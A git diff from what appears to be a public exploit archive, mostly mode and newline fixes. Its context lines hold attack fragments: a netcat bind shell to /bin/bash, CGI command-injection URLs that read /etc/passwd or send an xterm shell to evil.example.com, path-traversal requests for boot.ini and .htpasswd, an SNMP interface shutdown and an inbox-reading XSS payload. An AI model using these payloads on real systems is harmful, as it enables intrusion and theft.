--git a/platforms/multiple/local/19551.c b/platforms/multiple/local/19551.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19552.c b/platforms/multiple/local/19552.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19684.c b/platforms/multiple/local/19684.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19692.c b/platforms/multiple/local/19692.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19721.txt b/platforms/multiple/local/19721.txt old mode 100755 new mode 100644 index d9c84b0c1..843e850d3 --- a/platforms/multiple/local/19721.txt +++ b/platforms/multiple/local/19721.txt @@ -16,4 +16,4 @@ mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY Query OK, 0 rows affected (0.01 sec) mysql> exit -Bye \ No newline at end of file +Bye \ No newline at end of file diff --git a/platforms/multiple/local/19796.c b/platforms/multiple/local/19796.c old mode 100755 new mode 100644 index bd4a98339..bd5f6a1db --- a/platforms/multiple/local/19796.c +++ b/platforms/multiple/local/19796.c @@ -66,4 +66,4 @@ char **argv; execl("/usr/local/sbin/mtr", "mtr", 0); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/multiple/local/19821.c b/platforms/multiple/local/19821.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19912.txt b/platforms/multiple/local/19912.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/19967.txt b/platforms/multiple/local/19967.txt old mode 100755 new mode 100644 index a8a4673c8..3944c2db4 --- a/platforms/multiple/local/19967.txt +++ b/platforms/multiple/local/19967.txt @@ -8,4 +8,4 @@ e=encrypted byte p=byte's position in the string, mod 4. u = unencrypted byte -u=e-89+((3p^2-3p)/2) \ No newline at end of file +u=e-89+((3p^2-3p)/2) \ No newline at end of file diff --git a/platforms/multiple/local/19999.txt b/platforms/multiple/local/19999.txt old mode 100755 new mode 100644 index a5f81f3d3..64fe5c812 --- a/platforms/multiple/local/19999.txt +++ b/platforms/multiple/local/19999.txt @@ -8,4 +8,4 @@ $ bru -V ' > comsec::0:0::/:/bin/sh > ' $ su comsec -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/multiple/local/21020.c b/platforms/multiple/local/21020.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/21078.txt b/platforms/multiple/local/21078.txt old mode 100755 new mode 100644 index 739e51d04..aac1ac3c5 --- a/platforms/multiple/local/21078.txt +++ b/platforms/multiple/local/21078.txt @@ -30,4 +30,4 @@ F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 1 (the constants:) F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10 70 61 73 73 77 6F 72 64 0 <- stop -p a s s w o r d \ No newline at end of file +p a s s w o r d \ No newline at end of file diff --git a/platforms/multiple/local/21117.txt b/platforms/multiple/local/21117.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/21283.txt b/platforms/multiple/local/21283.txt old mode 100755 new mode 100644 index d6e750e78..e1e5fd3a4 --- a/platforms/multiple/local/21283.txt +++ b/platforms/multiple/local/21283.txt @@ -14,4 +14,4 @@ Hit enter Choose option 3, display current job Choose option 13, display library list Choose option 5 next to library QSYS -Scroll down to view names of all objects of type *USRPRF (user profile) \ No newline at end of file +Scroll down to view names of all objects of type *USRPRF (user profile) \ No newline at end of file diff --git a/platforms/multiple/local/21288.txt b/platforms/multiple/local/21288.txt old mode 100755 new mode 100644 index aff043968..fb389f406 --- a/platforms/multiple/local/21288.txt +++ b/platforms/multiple/local/21288.txt @@ -8,4 +8,4 @@ A local attacker may exploit this condition to overwrite the AdminPassword file Reports suggest that this issue only affects versions of Sawmill running on the Solaris operating system. It has not been confirmed whether versions on other operating systems are affected by this vulnerability. -rm AdminPassword; echo mypasswd | perl -p -e 'chomp' | md5sum | sed 's/ -//' | perl -p -e 'chomp' > AdminPassword \ No newline at end of file +rm AdminPassword; echo mypasswd | perl -p -e 'chomp' | md5sum | sed 's/ -//' | perl -p -e 'chomp' > AdminPassword \ No newline at end of file diff --git a/platforms/multiple/local/21359.c b/platforms/multiple/local/21359.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/21856.txt b/platforms/multiple/local/21856.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/22732.java b/platforms/multiple/local/22732.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/24923.txt b/platforms/multiple/local/24923.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/288.c b/platforms/multiple/local/288.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/28817.txt b/platforms/multiple/local/28817.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/30039.txt b/platforms/multiple/local/30039.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/30183.txt b/platforms/multiple/local/30183.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/30295.sql b/platforms/multiple/local/30295.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/30666.txt b/platforms/multiple/local/30666.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/30970.txt b/platforms/multiple/local/30970.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3177.txt b/platforms/multiple/local/3177.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3178.txt b/platforms/multiple/local/3178.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3179.txt b/platforms/multiple/local/3179.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/32055.txt b/platforms/multiple/local/32055.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/321.c b/platforms/multiple/local/321.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/32501.txt b/platforms/multiple/local/32501.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/32847.txt b/platforms/multiple/local/32847.txt old mode 100755 new mode 100644 index a1c22eee5..96b8d7ed5 --- a/platforms/multiple/local/32847.txt +++ b/platforms/multiple/local/32847.txt @@ -18,4 +18,4 @@ return true; END; $body$; -SELECT * FROM restricted_view WHERE do_tell(secret_column); \ No newline at end of file +SELECT * FROM restricted_view WHERE do_tell(secret_column); \ No newline at end of file diff --git a/platforms/multiple/local/3413.php b/platforms/multiple/local/3413.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3414.php b/platforms/multiple/local/3414.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3424.php b/platforms/multiple/local/3424.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3442.php b/platforms/multiple/local/3442.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/3559.php b/platforms/multiple/local/3559.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/37772.js b/platforms/multiple/local/37772.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/39595.txt b/platforms/multiple/local/39595.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/40164.c b/platforms/multiple/local/40164.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/40588.txt b/platforms/multiple/local/40588.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/40686.txt b/platforms/multiple/local/40686.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/40931.txt b/platforms/multiple/local/40931.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/41021.txt b/platforms/multiple/local/41021.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/41804.c b/platforms/multiple/local/41804.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/41870.txt b/platforms/multiple/local/41870.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/41904.txt b/platforms/multiple/local/41904.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4203.sql b/platforms/multiple/local/4203.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/42145.c b/platforms/multiple/local/42145.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/42407.txt b/platforms/multiple/local/42407.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4392.txt b/platforms/multiple/local/4392.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4564.txt b/platforms/multiple/local/4564.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4572.txt b/platforms/multiple/local/4572.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4994.sql b/platforms/multiple/local/4994.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4995.sql b/platforms/multiple/local/4995.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/4996.sql b/platforms/multiple/local/4996.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/629.c b/platforms/multiple/local/629.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7171.txt b/platforms/multiple/local/7171.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7503.txt b/platforms/multiple/local/7503.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7550.c b/platforms/multiple/local/7550.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7646.txt b/platforms/multiple/local/7646.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7675.txt b/platforms/multiple/local/7675.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7676.txt b/platforms/multiple/local/7676.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/7677.txt b/platforms/multiple/local/7677.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/8067.txt b/platforms/multiple/local/8067.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/8456.txt b/platforms/multiple/local/8456.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/8641.txt b/platforms/multiple/local/8641.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9072.txt b/platforms/multiple/local/9072.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9097.txt b/platforms/multiple/local/9097.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9489.txt b/platforms/multiple/local/9489.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9520.txt b/platforms/multiple/local/9520.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9985.txt b/platforms/multiple/local/9985.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/local/9990.txt b/platforms/multiple/local/9990.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10.c b/platforms/multiple/remote/10.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10001.txt b/platforms/multiple/remote/10001.txt old mode 100755 new mode 100644 index 899caa563..fbbe0b5ad --- a/platforms/multiple/remote/10001.txt +++ b/platforms/multiple/remote/10001.txt @@ -16,4 +16,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it. -This issue affects versions prior to CUPS 1.4.2. \ No newline at end of file +This issue affects versions prior to CUPS 1.4.2. \ No newline at end of file diff --git a/platforms/multiple/remote/1007.html b/platforms/multiple/remote/1007.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10071.txt b/platforms/multiple/remote/10071.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10086.txt b/platforms/multiple/remote/10086.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10093.txt b/platforms/multiple/remote/10093.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/10095.txt b/platforms/multiple/remote/10095.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1114.c b/platforms/multiple/remote/1114.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/11662.txt b/platforms/multiple/remote/11662.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/11817.txt b/platforms/multiple/remote/11817.txt old mode 100755 new mode 100644 index 0de56c159..97049c395 --- a/platforms/multiple/remote/11817.txt +++ b/platforms/multiple/remote/11817.txt @@ -16,4 +16,4 @@ halfapple:~ emanuelegentili$ cat ph33r.sgrd <!DOCTYPE KSysGuardWorkSheet> <WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" > <host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet> -halfapple:~ emanuelegentili$ \ No newline at end of file +halfapple:~ emanuelegentili$ \ No newline at end of file diff --git a/platforms/multiple/remote/11856.txt b/platforms/multiple/remote/11856.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1188.c b/platforms/multiple/remote/1188.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12033.txt b/platforms/multiple/remote/12033.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12114.txt b/platforms/multiple/remote/12114.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12122.txt b/platforms/multiple/remote/12122.txt old mode 100755 new mode 100644 index 613d4d15e..0f62efc6f --- a/platforms/multiple/remote/12122.txt +++ b/platforms/multiple/remote/12122.txt @@ -123,4 +123,4 @@ Not vulnerable. Workaround -Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory. \ No newline at end of file +Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory. \ No newline at end of file diff --git a/platforms/multiple/remote/12263.txt b/platforms/multiple/remote/12263.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12264.txt b/platforms/multiple/remote/12264.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12304.txt b/platforms/multiple/remote/12304.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12343.txt b/platforms/multiple/remote/12343.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/12804.txt b/platforms/multiple/remote/12804.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1292.pm b/platforms/multiple/remote/1292.pm old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1369.html b/platforms/multiple/remote/1369.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/13787.txt b/platforms/multiple/remote/13787.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/14360.txt b/platforms/multiple/remote/14360.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/14386.html b/platforms/multiple/remote/14386.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/14387.html b/platforms/multiple/remote/14387.html old mode 100755 new mode 100644 index a3430cc02..7508a177f --- a/platforms/multiple/remote/14387.html +++ b/platforms/multiple/remote/14387.html @@ -37,9 +37,4 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> <p align="center"> </p> <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p> <p align="center">http://Securitylab.ir/Advisory</p> -</html> - - - - - \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/multiple/remote/14388.html b/platforms/multiple/remote/14388.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/14602.txt b/platforms/multiple/remote/14602.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/14875.txt b/platforms/multiple/remote/14875.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/15005.txt b/platforms/multiple/remote/15005.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/15298.txt b/platforms/multiple/remote/15298.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/15617.txt b/platforms/multiple/remote/15617.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/15717.txt b/platforms/multiple/remote/15717.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1602.c b/platforms/multiple/remote/1602.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/16041.txt b/platforms/multiple/remote/16041.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/16103.txt b/platforms/multiple/remote/16103.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/16137.c b/platforms/multiple/remote/16137.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/17078.java b/platforms/multiple/remote/17078.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1794.pm b/platforms/multiple/remote/1794.pm old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/1799.txt b/platforms/multiple/remote/1799.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/18245.py b/platforms/multiple/remote/18245.py index 4128b50ad..1f903b3e3 100755 --- a/platforms/multiple/remote/18245.py +++ b/platforms/multiple/remote/18245.py @@ -645,6 +645,4 @@ def main(): if __name__ == '__main__': - main() - - \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/multiple/remote/18442.html b/platforms/multiple/remote/18442.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/18619.txt b/platforms/multiple/remote/18619.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/18763.txt b/platforms/multiple/remote/18763.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19081.txt b/platforms/multiple/remote/19081.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19084.txt b/platforms/multiple/remote/19084.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19093.txt b/platforms/multiple/remote/19093.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19118.txt b/platforms/multiple/remote/19118.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19120.txt b/platforms/multiple/remote/19120.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19121.txt b/platforms/multiple/remote/19121.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19127.txt b/platforms/multiple/remote/19127.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19129.txt b/platforms/multiple/remote/19129.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19193.txt b/platforms/multiple/remote/19193.txt old mode 100755 new mode 100644 index dfcb32261..91f0a1ac3 --- a/platforms/multiple/remote/19193.txt +++ b/platforms/multiple/remote/19193.txt @@ -4,4 +4,4 @@ An Allaire Forums file "GetFile.cfm" in the root of the application directory al Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes") where C:\boot.ini is the pathname and file to read. -The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#"> \ No newline at end of file +The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#"> \ No newline at end of file diff --git a/platforms/multiple/remote/19194.txt b/platforms/multiple/remote/19194.txt old mode 100755 new mode 100644 index f780940ac..a4fad8066 --- a/platforms/multiple/remote/19194.txt +++ b/platforms/multiple/remote/19194.txt @@ -22,4 +22,4 @@ ShowTheFreakinThing = ts.ReadAll Response.Write ShowTheFreakinThing ' EOF -%> \ No newline at end of file +%> \ No newline at end of file diff --git a/platforms/multiple/remote/19221.txt b/platforms/multiple/remote/19221.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19222.txt b/platforms/multiple/remote/19222.txt old mode 100755 new mode 100644 index 6acf8c552..cd8bf20db --- a/platforms/multiple/remote/19222.txt +++ b/platforms/multiple/remote/19222.txt @@ -6,4 +6,4 @@ Gordano's NTMail is a Windows NT mail server program. One of its features is all The web server fails to check whether requested files fall outside its document tree (by using ".." in the URL). Thus attackers can retrieve files in the same drives as that on which the software resides if they know or can get it's filename. -http://www.example.com:8000/../../../../../boot.ini \ No newline at end of file +http://www.example.com:8000/../../../../../boot.ini \ No newline at end of file diff --git a/platforms/multiple/remote/19223.txt b/platforms/multiple/remote/19223.txt old mode 100755 new mode 100644 index 59e0d29c6..89c4dc939 --- a/platforms/multiple/remote/19223.txt +++ b/platforms/multiple/remote/19223.txt @@ -6,4 +6,4 @@ Floosietek's FTGate is a Win32 mail server program. One of its features is allow The web server fails to check whether requested files fall outside its document tree (by using ".." in the URL). Thus attackers can retrieve files in the same drives as that on which the software resides if they know or can get it's filename. -http://www.example.com:8080/../newuser.txt \ No newline at end of file +http://www.example.com:8080/../newuser.txt \ No newline at end of file diff --git a/platforms/multiple/remote/19242.txt b/platforms/multiple/remote/19242.txt old mode 100755 new mode 100644 index d33c26935..91a9755d0 --- a/platforms/multiple/remote/19242.txt +++ b/platforms/multiple/remote/19242.txt @@ -5,4 +5,4 @@ A vulnerability in a CGI program part of CdomainFree allows remote malicious use The vulnerability is in the whois_raw.cgi program. This CGI passes user input to the shell without proper filtering. None of the Cdomain commercial version (e.g. CdomainPro) are vulnerable as they connect the the whois servers directly. http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd -http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0 \ No newline at end of file +http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0 \ No newline at end of file diff --git a/platforms/multiple/remote/19298.txt b/platforms/multiple/remote/19298.txt old mode 100755 new mode 100644 index e2d6d993d..b842a1e6c --- a/platforms/multiple/remote/19298.txt +++ b/platforms/multiple/remote/19298.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/373/info A vulnerability exists in the cgi-bin program 'wrap', as included with Irix 6.2 from SGI. A failure to validate input results in a vulnerability that allows any remote attacker to view the contents of any world readable directory remotely. This can be used to gain information that may be helpful in carrying out other attacks. -http://sgi.victim/cgi-bin/wrap?/../../../../../etc \ No newline at end of file +http://sgi.victim/cgi-bin/wrap?/../../../../../etc \ No newline at end of file diff --git a/platforms/multiple/remote/19299.txt b/platforms/multiple/remote/19299.txt old mode 100755 new mode 100644 index 987332cb9..3e6e3b38e --- a/platforms/multiple/remote/19299.txt +++ b/platforms/multiple/remote/19299.txt @@ -7,4 +7,4 @@ A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahic or -http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh \ No newline at end of file +http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh \ No newline at end of file diff --git a/platforms/multiple/remote/19303.txt b/platforms/multiple/remote/19303.txt old mode 100755 new mode 100644 index 3e9a7cbaa..c92c2efc3 --- a/platforms/multiple/remote/19303.txt +++ b/platforms/multiple/remote/19303.txt @@ -10,4 +10,4 @@ or: telnet target.machine.com 80 GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download -NOTE: large spaces are actually tabs. \ No newline at end of file +NOTE: large spaces are actually tabs. \ No newline at end of file diff --git a/platforms/multiple/remote/19363.txt b/platforms/multiple/remote/19363.txt old mode 100755 new mode 100644 index 0b972e1dc..de809012f --- a/platforms/multiple/remote/19363.txt +++ b/platforms/multiple/remote/19363.txt @@ -7,4 +7,4 @@ Netscape's Fasttrack server is supposed to display a directory listing if the fo However, even with an index file in the directory, if you telnet to the httpd port and type 'get/' you will get a directory listing of the root directory. -Telnet to the httpd port and type 'get/' to get a root directory listing. \ No newline at end of file +Telnet to the httpd port and type 'get/' to get a root directory listing. \ No newline at end of file diff --git a/platforms/multiple/remote/19383.txt b/platforms/multiple/remote/19383.txt old mode 100755 new mode 100644 index 051c14215..35d255d79 --- a/platforms/multiple/remote/19383.txt +++ b/platforms/multiple/remote/19383.txt @@ -12,4 +12,4 @@ NT and Win9x: h t t p://www.server.com:8010/c:/ h t t p://www.server.com:8010// Win9x only: -h t t p://www.server.com:8010/..../ \ No newline at end of file +h t t p://www.server.com:8010/..../ \ No newline at end of file diff --git a/platforms/multiple/remote/19420.c b/platforms/multiple/remote/19420.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19421.c b/platforms/multiple/remote/19421.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19426.c b/platforms/multiple/remote/19426.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19443.txt b/platforms/multiple/remote/19443.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19451.txt b/platforms/multiple/remote/19451.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19459.txt b/platforms/multiple/remote/19459.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19466.txt b/platforms/multiple/remote/19466.txt old mode 100755 new mode 100644 index 3d02761b4..d1d9a04b3 --- a/platforms/multiple/remote/19466.txt +++ b/platforms/multiple/remote/19466.txt @@ -12,4 +12,4 @@ http://www.victim.org/cgi-bin/w3-msql/protected-directory/private-file Second Approach: This approach will gain the intruder a DES encrypted password which they can then attempt to crack it via any number of popular cracking utilites. -http://www.victim.org/cgi-bin/w3-msql/protected-directory/.htpasswd \ No newline at end of file +http://www.victim.org/cgi-bin/w3-msql/protected-directory/.htpasswd \ No newline at end of file diff --git a/platforms/multiple/remote/19492.txt b/platforms/multiple/remote/19492.txt old mode 100755 new mode 100644 index 2ab1ab926..c1f54cf54 --- a/platforms/multiple/remote/19492.txt +++ b/platforms/multiple/remote/19492.txt @@ -18,4 +18,4 @@ alert('JavaScript is executed'); a=window.open(document.links[2]); setTimeout('alert(\'The first message in your Inbox is from: \'+a.document.links[26].text)',20000); -&lt;/STYLE&gt; \ No newline at end of file +&lt;/STYLE&gt; \ No newline at end of file diff --git a/platforms/multiple/remote/19493.txt b/platforms/multiple/remote/19493.txt old mode 100755 new mode 100644 index 31add9887..eba1376a7 --- a/platforms/multiple/remote/19493.txt +++ b/platforms/multiple/remote/19493.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/631/info Enterprise Server 3.6 SP2 with the SSL Handshake Patch applied is vulnerable to a buffer overflow that may allow attackers to launch denial-of-service attacks and to execute arbitrary commands on the webserver. GET / HTTP/1.0 -Accept: aaaaaaaaaaaaaa...2000byte/gif \ No newline at end of file +Accept: aaaaaaaaaaaaaa...2000byte/gif \ No newline at end of file diff --git a/platforms/multiple/remote/19560.c b/platforms/multiple/remote/19560.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19644.txt b/platforms/multiple/remote/19644.txt old mode 100755 new mode 100644 index 9152c19cf..e713fb618 --- a/platforms/multiple/remote/19644.txt +++ b/platforms/multiple/remote/19644.txt @@ -4,4 +4,4 @@ Mail-Gear, a multi-purpose filtering email server, includes a webserver for remo http: //target.host:8003/Display?what=../../../../../autoexec.bat -will display the server's autoexec.bat in a default NT installation. \ No newline at end of file +will display the server's autoexec.bat in a default NT installation. \ No newline at end of file diff --git a/platforms/multiple/remote/19667.c b/platforms/multiple/remote/19667.c old mode 100755 new mode 100644 index 7c99fb7a3..1268983bf --- a/platforms/multiple/remote/19667.c +++ b/platforms/multiple/remote/19667.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/863/info Xshipwars a graphical 'star battle' client/server based game which runs a variety of platforms. Certain versions of the server which facilitates this game (versions before 1.25) had a remotely exploitable buffer overflow. The exploit would result in the execution of arbitrary commands as the UID of the server process. +*/ /* If the offset is off for your box, then the server will still crash, and will begin an endless loop of sending itself log messages, diff --git a/platforms/multiple/remote/19686.txt b/platforms/multiple/remote/19686.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19712.txt b/platforms/multiple/remote/19712.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19732.html b/platforms/multiple/remote/19732.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19742.txt b/platforms/multiple/remote/19742.txt old mode 100755 new mode 100644 index d0a2559c4..5fc4dfdc4 --- a/platforms/multiple/remote/19742.txt +++ b/platforms/multiple/remote/19742.txt @@ -6,4 +6,4 @@ idq.dll will follow the '../' string in the specification of a template file. An The webhits.dll patch (Microsoft Security Bulletin MS00-006, at http://www.securityfocus.com/templates/advisory.html?id=2060, and Bugtraq ID 950, at http://www.securityfocus.com/bid/950)may in some cases affect the nature of this vulnerability. If this patch has been applied, IDQ files will only be vulnerable if they do not append the .htx extension. -http ://target/query.idq?CiTemplate=../../../somefile.ext \ No newline at end of file +http ://target/query.idq?CiTemplate=../../../somefile.ext \ No newline at end of file diff --git a/platforms/multiple/remote/19749.txt b/platforms/multiple/remote/19749.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19751.txt b/platforms/multiple/remote/19751.txt old mode 100755 new mode 100644 index 419dcf362..3758edecb --- a/platforms/multiple/remote/19751.txt +++ b/platforms/multiple/remote/19751.txt @@ -30,4 +30,4 @@ The attacks can include manipulating routing tables and corrupting ARP caches, w snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2 -This will make the primary interface on the target host (with a default community of public or private) change state to two, which is "down". \ No newline at end of file +This will make the primary interface on the target host (with a default community of public or private) change state to two, which is "down". \ No newline at end of file diff --git a/platforms/multiple/remote/19784.txt b/platforms/multiple/remote/19784.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19800.c b/platforms/multiple/remote/19800.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19814.c b/platforms/multiple/remote/19814.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/19824.txt b/platforms/multiple/remote/19824.txt old mode 100755 new mode 100644 index c5a125ba5..b55132849 --- a/platforms/multiple/remote/19824.txt +++ b/platforms/multiple/remote/19824.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/1081/info If a virtual host root is mapped to a UNC share, a backward slash "\" appended to an ASP or HTR extension in a URL request to that virtual host will cause 